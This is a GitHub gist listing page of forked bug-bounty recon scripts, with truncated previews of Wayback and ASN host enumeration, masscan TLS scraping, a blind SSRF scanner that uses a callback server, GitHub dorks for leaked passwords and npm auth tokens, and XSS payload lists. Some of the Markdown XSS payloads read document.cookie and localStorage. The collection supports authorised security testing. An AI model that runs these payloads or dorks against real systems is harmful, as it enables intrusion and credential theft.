This is a simple guide to perform javascript recon in the bugbounty
- The first step is to collect possibly several javascript files (
more files=more paths,parameters->more vulns)
wargg
/ waybackrobots.py
Created
April 27, 2024 19:58
— forked from mhmdiaa/waybackrobots.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
wargg
/ alert.js
Created
December 12, 2020 23:30
— forked from tomnomnom/alert.js
Ways to alert(document.domain)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // How many ways can you alert(document.domain)? | |
| // Comment with more ways and I'll add them :) | |
| // I already know about the JSFuck way, but it's too long to add (: | |
| // Direct invocation | |
| alert(document.domain); | |
| (alert)(document.domain); | |
| al\u0065rt(document.domain); | |
| al\u{65}rt(document.domain); | |
| window['alert'](document.domain); |
wargg
/ hostsbyasnname.py
Created
December 12, 2020 15:13
— forked from ziot/hostsbyasnname.py
Get hosts by ASN->CIDR->Hosts via company name
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, json | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning | |
| from bs4 import BeautifulSoup | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) | |
| requests.packages.urllib3.disable_warnings(SNIMissingWarning) | |
| # another source of cidrs by asn | |
| def getIPCidrs(asn): |
wargg
/ exrex.go
Created
December 7, 2020 21:35
— forked from bored-engineer/exrex.go
A go program to expand a regular expression into every possible matching string
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "os" | |
| "fmt" | |
| "strings" | |
| "regexp/syntax" | |
| "unicode/utf8" | |
| ) |
wargg
/ slack.sh
Created
December 3, 2020 18:43
— forked from andkirby/slack.sh
Shell/Bash script for sending slack messages.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| #################################################################################### | |
| # Slack Bash console script for sending messages. | |
| #################################################################################### | |
| # Installation | |
| # $ curl -s https://gist.github.com/andkirby/67a774513215d7ba06384186dd441d9e/raw --output /usr/bin/slack | |
| # $ chmod +x /usr/bin/slack | |
| #################################################################################### | |
| # USAGE | |
| # Send message to slack channel/user |
wargg
/ Github bash generated search links (from hunter.sh)
Created
July 8, 2020 19:04
— forked from jhaddix/Github bash generated search links (from hunter.sh)
Github bash generated search links (from hunter.sh)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
wargg
/ tlsScrape.sh
Created
June 6, 2020 22:13
— forked from mzet-/tlsScrape.sh
Inspired by https://github.com/cheetz/sslScrape tool. Significantly shorter and slightly faster version.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TARGETS="$1" | |
| PORT=443 | |
| # if file "$TARGETS" exists use its content as a target specification otherwise treat input as a cidr | |
| if [ -f "$TARGETS" ]; then | |
| IPs="$(masscan -oL - -iL "$TARGETS" -p "$PORT" 2>/dev/null | grep -v "^#.*" | cut -d' ' -f4)" | |
| else | |
| IPs="$(masscan -oL - "$TARGETS" -p "$PORT" 2>/dev/null | grep -v "^#.*" | cut -d' ' -f4)" |
wargg
/ ssrf.sh
Created
May 8, 2020 11:41
— forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |
wargg
/ Markdown XSS fuzzlist
Created
May 6, 2020 11:02
— forked from yassineaboukir/Markdown XSS fuzzlist
Source: https://github.com/JakobRPennington/InformationSecurity/tree/master/Payloads/md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Basic](javascript:alert('Basic')) | |
| [Local Storage](javascript:alert(JSON.stringify(localStorage))) | |
| [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) | |
| [URL](javascript://www.google.com%0Aalert('URL')) | |
| [In Quotes]('javascript:alert("InQuotes")') | |
| ![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad')) | |
| ![Escape SRC - onerror]("onerror="alert('ImageOnError')) | |
| [XSS](javascript:prompt(document.cookie)) | |
| [XSS](j a v a s c r i p t:prompt(document.cookie)) | |
| [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) |
NewerOlder